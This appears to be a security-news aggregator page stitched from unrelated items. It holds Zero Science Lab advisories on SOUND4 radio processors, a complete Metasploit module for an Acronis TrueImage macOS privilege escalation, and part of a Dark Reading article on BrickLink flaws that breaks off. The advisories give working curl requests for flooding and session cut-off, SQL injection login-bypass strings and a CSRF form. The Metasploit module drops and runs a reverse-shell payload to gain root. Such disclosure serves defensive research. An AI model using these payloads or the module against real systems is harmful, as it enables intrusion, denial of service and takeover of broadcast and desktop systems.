SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below allow an unauthenticated attacker to send network signals to an arbitrary target host that can be abused in an ICMP flooding attack. This includes the utilization of the ping, traceroute and nslookup commands through ping.php, traceroute.php and dns.php respectively.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping/traceroute) ICMP Flood AttackVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application allows an unauthenticated attacker to send networksignals to an arbitrary target host that can be abused in an ICMP floodingattack. This includes the utilisation of the ping, traceroute and nslookupcommands through ping.php, traceroute.php and dns.php respectively.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5728Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5728.php26.09.2022--> curl -XPOST -sk https://RADIO/ping.php --data "ping_host=localhost&networkid=251" # ping -c 3 -W 5 %s> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=localhost&networkid=251"> curl -XPOST -sk https://RADIO/dns.php --data "dns_host=localhost&networkid=251"

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x ICMP Flood Attack

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username SQL injection vulnerability that allows for authentication bypass.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Authentication BypassVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an SQL Injection vulnerability. Inputpassed through the 'username' POST parameter in 'index.php' is not properlysanitised before being returned to the user or used in SQL queries. Thiscan be exploited to manipulate SQL queries by injecting arbitrary SQL codeand bypass the authentication mechanism.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5727Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php26.09.2022--POST /index.php HTTP/1.1username='+joxy--+z&password=05C13NCE

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x username SQL Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a password SQL injection vulnerability that allows for authentication bypass.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Authentication BypassVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an SQL Injection vulnerability. Inputpassed through the 'password' POST parameter in 'index.php' is not properlysanitised before being returned to the user or used in SQL queries. Thiscan be exploited to manipulate SQL queries by injecting arbitrary SQL codeand bypass the authentication mechanism.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5726Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php26.09.2022--POST /index.php HTTP/1.1username=t00t&password='+joxy--+z

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x password SQL Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below allows an unauthenticated attacker to disconnect the current monitoring user from listening/monitoring and takeover the radio stream on a specific channel.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Disconnect Webmonitor User (DoS)Vendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application allows an unauthenticated attacker to disconnect thecurrent monitoring user from listening/monitoring and takeover the radiostream on a specific channel.------------------------------------------------------------------------/var/www/killffmpeg.php:------------------------01: <?php02:     $ret=0;03:     exec("bash -c 'kill $(cat /tmp/webplay.pid)'",$out,$ret);04:     echo $ret;05: ?>------------------------------------------------------------------------Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5725Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php26.09.2022--> curl -sko -nul https://RADIO/killffmpeg.php

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Disconnect Webmonitor User Denial Of Service

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffers from an insufficient session expiration vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session ExpirationVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: 4.1.102Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers an insufficient session expiration. Thisoccurs when the web application permits an attacker to reuse old sessioncredentials or session IDs for authorization. Insufficient session expirationincreases the device's exposure to attacks that can steal or reuse user'ssession identifiers.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5724Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php26.09.2022--Session valid after 96 hours:POST /checklogin.php HTTP/1.1Host: RADIOCookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0Content-Length: 34Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://RADIOSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://RADIO/linkandshare.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closesession=q9rooqkl3kl20aianmveimu23qHTTP/1.1 200 OKDate: Sat, 03 Jan 1970 11:13:19 GMTServer: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1X-Powered-By: PHP/7.1.1Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheVary: User-AgentContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-80

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Insufficient Session Expiration

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an authorization bypass due to an insecure direct object reference vulnerability.

  
SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authorization Bypass (IDOR)

Vendor: SOUND4 Ltd.  
Product web page: https://www.sound4.com | https://www.sound4.biz  
Affected version: FM/HD Radio Processing:  
                  Impact/Pulse/First (Version 2: 1.1/2.15)  
                  Impact/Pulse/First (Version 1: 2.1/1.69)  
                  Impact/Pulse Eco 1.16  
                  Voice Processing:  
                  BigVoice4 1.2  
                  BigVoice2 1.30  
                  Web-Audio Streaming:  
                  Stream 1.1/2.4.29  
                  Watermarking:  
                  WM2 (Kantar Media) 1.11

Summary: The SOUND4 IMPACT introduces an innovative process - mono and  
stereo parts of the signal are processed separately to obtain perfect  
consistency in terms of both sound and level. Therefore, in moving  
reception, when the FM receiver switches from stereo to mono and back to  
stereo, the sound variations and changes in level are reduced by over 90%.  
In the SOUND4 IMPACT processing chain, the stereo expander can be used  
substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4  
PULSE gives clients the ultimate price - performance ratio, providing  
much more than just a processor. Flexible and powerful, it ensures perfect  
sound quality and full compatibility with radio broadcasting standards  
and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need  
in an FM/HD processor and sets the bar high both in terms of performance  
and affordability. Designed to deliver a sound of uncompromising quality,  
this tool gives you 2-band processing, a digital stereo generator and an  
IMPACT Clipper.

Desc: The application is vulnerable to insecure direct object references  
that occur when the application provides direct access to objects based  
on user-supplied input. As a result of this vulnerability attackers can  
bypass authorization and access the hidden resources on the system and  
execute privileged functionalities.

Tested on: Apache/2.4.25 (Unix)  
           OpenSSL/1.0.2k  
           PHP/7.1.1  
           GNU/Linux 5.10.43 (armv7l)  
           GNU/Linux 4.9.228 (armv7l)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5723  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php

26.09.2022

--

(GET|POST) /** HTTP/1.1

/var/www/:  
----------

.SOUND4  
about.php  
actioninprogress.php  
broken_error.php  
cfg_filewatch.xml  
cfg_filewatch_specific.xml  
checklogin.php  
checkserver.php  
config.php  
datahandlerdlg.php  
descrxml.php  
dns.php  
downloads  
downloads.php  
fullrebootsystem.php  
global.php  
globaljs.php  
guifactorysettings.xml  
guixml.php  
guixml_error.php  
header.php  
images  
index.php  
isreboot.php  
jquery-3.2.1.min.js  
jquery-plugins  
jquery-ui-custom  
jquery-ui-i18n.js  
jquery-ui.css  
jquery-ui.js  
jquery.js  
jquery.ui.touch-punch.min.js  
killffmpeg.php  
linkandshare.php  
login.php  
logout.php  
monitor.php  
networkdiagnostic.php  
partialrebootsystem.php  
ping.php  
playercfg.xml  
rebootsystem.php  
restoreinprogress.php  
script.min.js  
secure.php  
serverinprogress.php  
settings.php  
setup.php  
setup_ethernet.php  
style.min.css  
traceroute.php  
upgrade  
upgrade.php  
upgradeinprogress.php  
uploaded_guicustomload.php  
uploaded_kantarlic.php  
uploaded_licfile.php  
uploaded_logo.php  
uploaded_presetfile.php  
uploaded_restorefile.php  
uploaded_upgfile.php  
validate_tz.php  
ws.min.js  
ws.php  
wsjquery-class.min.js  
www-data-handler.php

/usr/cgi-bin/:  
--------------

(GET|POST) /** HTTP/1.1

backup.cgi  
cgi-form-data  
downloadkantarlic.cgi  
ffmpeg.cgi  
frontpanel  
getlogs.cgi  
getlogszip.cgi  
guicustomsettings.cgi  
guicustomsettingsload.cgi  
guifactorysettings.cgi  
importpreset.cgi  
loghandler.php  
logo  
logoremove.cgi  
logoupload.cgi  
phptail.php  
printenv  
printenv.vbs  
printenv.wsf  
restore.cgi  
restorefactory.cgi  
test-cgi  
upgrade.cgi  
upload.cgi

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Authorization Bypass

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a cross site request forgery vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Cross-Site Request ForgeryVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application interface allows users to perform certain actionsvia HTTP requests without performing any validity checks to verify therequests. This can be exploited to perform certain actions with administrativeprivileges if a logged-in user visits a malicious web site.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5722Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php26.09.2022--PoC:----<form action="http://RADIO/cgi-bin/logoremove.cgi" method="POST">  <input type="submit" value="Disappear" /></form>

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Cross Site Request Forgery

SOUND4 Server Service version 4.1.102 suffers from an unquoted search path issue impacting the service SOUND4 Server for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

  
SOUND4 Server Service 4.1.102 Local Privilege Escalation

Vendor: SOUND4 Ltd.  
Product web page: https://www.sound4.com | https://www.sound4.biz  
Affected version: 4.1.102

Summary: SOUND4 Windows Server Service.

Desc: The application suffers from an unquoted search path issue impacting  
the service 'SOUND4 Server' for Windows. This could potentially allow an  
authorized but non-privileged local user to execute arbitrary code with  
elevated privileges on the system. A successful attempt would require the  
local user to be able to insert their code in the system root path undetected  
by the OS or other security applications where it could potentially be executed  
during application startup or reboot. If successful, the local user's code  
would execute with the elevated privileges of the application.

Tested on: Windows 10 Home 64 bit (build 9200)  
           SOUND4 Server v4.1.102  
           SOUND4 Remote Control v4.3.17

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5721  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php

26.09.2022

--

C:\>sc qc "SOUND4 Server"  
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SOUND4 Server  
        TYPE               : 10  WIN32_OWN_PROCESS  
        START_TYPE         : 2   AUTO_START  
        ERROR_CONTROL      : 1   NORMAL  
        BINARY_PATH_NAME   : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service  
        LOAD_ORDER_GROUP   :  
        TAG                : 0  
        DISPLAY_NAME       : SOUND4 Server  
        DEPENDENCIES       :  
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe"  
C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F  
                                                 BUILTIN\Administrators:(ID)F  
                                                 BUILTIN\Users:(ID)R  
                                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R  
                                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V  
4.1.102

SOUND4 Server Service 4.1.102 Local Privilege Escalation

Acronis TrueImage versions 2019 update 1 through 2021 update 1 are vulnerable to privilege escalation. The com.acronis.trueimagehelper helper tool does not perform any validation on connecting clients, which gives arbitrary clients the ability to execute functions provided by the helper tool with root privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::File  include Msf::Post::Common  include Msf::Post::Process  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Acronis TrueImage XPC Privilege Escalation',        'Description' => %q{          Acronis TrueImage versions 2019 update 1 through 2021 update 1          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`          helper tool does not perform any validation on connecting clients,          which gives arbitrary clients the ability to execute functions provided          by the helper tool with `root` privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'Csaba Fitzl', # @theevilbit - Vulnerability Discovery          'Shelby Pace' # Metasploit Module and Objective-c code        ],        'Platform' => [ 'osx' ],        'Arch' => [ ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'CVE', '2020-25736' ],          [ 'URL', 'https://kb.acronis.com/content/68061' ],          [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',          'WfsDelay' => 15        },        'DisclosureDate' => '2020-11-11',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options([      OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),      OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),      OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])    ])  end  def tmp_dir    datastore['WRITABLE_DIR'].to_s  end  def sys_shell    datastore['SHELL'].to_s  end  def compile    datastore['COMPILE']  end  def compile_on_target?    return false if compile == 'False'    if compile == 'Auto'      ret = cmd_exec('xcode-select -p')      return false if ret.include?('error: unable')    end    true  end  def exp_file_name    @exp_file_name ||= Rex::Text.rand_text_alpha(5..10)  end  def check    helper_location = '/Library/PrivilegedHelperTools'    helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]    plist = '/Applications/Acronis True Image.app/Contents/Info.plist'    unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }      return CheckCode::Safe    end    return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)    plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"    build_no = cmd_exec(plutil_cmd)    return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?    build_no = build_no.to_i    vprint_status("Found build #{build_no}")    return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610    CheckCode::Safe('Acronis version found is not vulnerable')  end  def exploit    payload_name = Rex::Text.rand_text_alpha(7)    @payload_path = "#{tmp_dir}/#{payload_name}"    print_status("Attempting to write payload at #{@payload_path}")    unless upload_and_chmodx(@payload_path, generate_payload_exe)      fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')    end    vprint_good("Successfully wrote payload at #{@payload_path}")    @pid = get_valid_pid    exp_bin_path = "#{tmp_dir}/#{exp_file_name}"    if compile_on_target?      exp_src = "#{exp_file_name}.m"      exp_path = "#{tmp_dir}/#{exp_src}"      compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"      unless write_file(exp_path, objective_c_code)        fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')      end      register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)      ret = cmd_exec(compile_cmd)      fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?      print_status("Successfully compiled #{exp_src}...Now executing payload")    else      print_status("Using pre-compiled exploit #{exp_bin_path}")      compiled_exploit = compiled_exp      unless upload_and_chmodx(exp_bin_path, compiled_exploit)        fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')      end      register_files_for_cleanup(exp_bin_path, @payload_path)    end    cmd_exec(exp_bin_path)  end  def objective_c_code    file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')    ERB.new(file_contents).result(binding)  rescue Errno::ENOENT    fail_with(Failure::NotFound, 'ERB payload file not found')  end  def compiled_exp    compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')    compiled.gsub!('/tmp/payload', @payload_path)    compiled.gsub!('/bin/zsh', sys_shell)    compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))    compiled  end  def get_valid_pid    procs = get_processes    return '1' if procs.empty?    len = procs.length    rand_proc = procs[rand(1...len)]    return '1' if rand_proc['pid'].to_s.blank?    rand_proc['pid'].to_s  endend

Acronis TrueImage XPC Privilege Escalation

Attackers also could breach internal production data to compromise a corporate network using vulnerabilities found in the BrickLink online platform.

API flaws in a widely used Lego online marketplace could have allowed attackers to take over user accounts, leak sensitive data stored on the platform, and even gain access to internal production data to compromise corporate services, researchers have found.

Researchers from Salt Labs discovered the vulnerabilities in BrickLink, a digital resale platform owned by the Lego Group for buying and selling second-hand Legos, demonstrating that — technology-wise, anyway — not all of the company's toy pieces snap perfectly into place.

Salt Security's research arm discovered both vulnerabilities by investigating areas of the site that support user input fields, Shiran Yodev, Salts Labs security researcher, revealed in a report published on Dec. 15.

The researchers found each of the core flaws that could be exploited for attack in parts of the site that allow for user input, which they said is often a place where API security issues — a complex and costly problem for organizations — arise.

One flaw was a cross-site scripting (XSS) vulnerability that enabled them to inject and execute code on a victim end user’s machine through a crafted link, they said. The other allowed for the execution of an XML External Entity (XXE) injection attack, where an XML input containing a reference to an external entity is processed by a weakly configured XML parser.

**API Weaknesses Abound**

The researchers were careful to stress that they didn't intend to single out Lego as a particularly negligent technology provider — on the contrary, API flaws in Internet-facing applications are incredibly common, they said.

There is a key reason for that, Yodev tells Dark Reading**:** No matter the competency of an IT design and development team, API security is a new discipline that all Web developers and designers are still figuring out.

"We readily find these kinds of serious API vulnerabilities in all sorts of online services we investigate," he says. "Even companies with the most robust application security tooling and advanced security teams frequently have gaps in their API business logic."

And while both flaws could have been discovered easily through pre-production security testing, "API security is still an afterthought for many organizations," notes Scott Gerlach, co-founder and CSO at StackHawk, an API security testing provider.

"It usually doesn't come into play until after an API has already been deployed, or in other cases, organizations are using legacy tooling not built to test APIs thoroughly, leaving vulnerabilities like cross-site scripting and injection attacks undiscovered," he says.

**Personal Interest, Rapid Response**

The research to investigate Lego's BrickLink was not meant to shame and blame Lego or "make anyone look bad," but rather to demonstrate "how common these mistakes are and to educate companies on steps they can take to protect their key data and services," Yodev says.

The Lego Group is the world’s largest toy company and a massively recognizable brand that can indeed draw people's attention to the issue, the researchers said. The company earns billions of dollars in revenue per year, not only because of children's interest in using Legos but also as a result of an entire adult hobbyist community — of which Yodev admits he is one — that also collects and builds Lego sets.

Because of the popularity of Legos, BrickLink has more than 1 million members that use its site.

The researchers discovered the flaws on Oct. 18, and, to its credit, Lego responded quickly when Salt Security revealed the issues to the company on Oct. 23, confirming the disclosure within two days. Tests conducted by Salt Labs confirmed shortly after, on Nov. 10, that the issues had been resolved, the researchers said.

"However, due to Lego's internal policy, they cannot share any information regarding reported vulnerabilities, and we are therefore unable to positively confirm," Yodev acknowledges. Moreover, this policy also prevents Salt Labs from confirming or denying if attackers exploited either of the flaws in the wild, he says.

**Snapping Together the Vulnerabilities**

Researchers found the XSS flaw in the “Find Username” dialog box of BrickLinks' coupon search functionality, leading to an attack chain using a session ID exposed on a different page, they said.

"In the 'Find Username' dialog box, a user can write a free text that eventually ends up rendered into the webpage’s HTML," Yodev wrote. "Users can abuse this open field to input text that can lead to an XSS condition."

Though the researchers couldn't use the flaw on its own to mount an attack, they found an exposed session ID on a different page that they could combine with the XSS flaw to hijack a user's session and achieve account takeover (ATO), they explained.

"Bad actors could have used these tactics for full account takeover or to steal sensitive user data," Yodev wrote.

Researchers uncovered the second flaw in another part of the platform that receives direct user input, called "Upload to Wanted List," which allows BrickLink users to upload a list of wanted Lego parts and/or sets in XML format, they said.

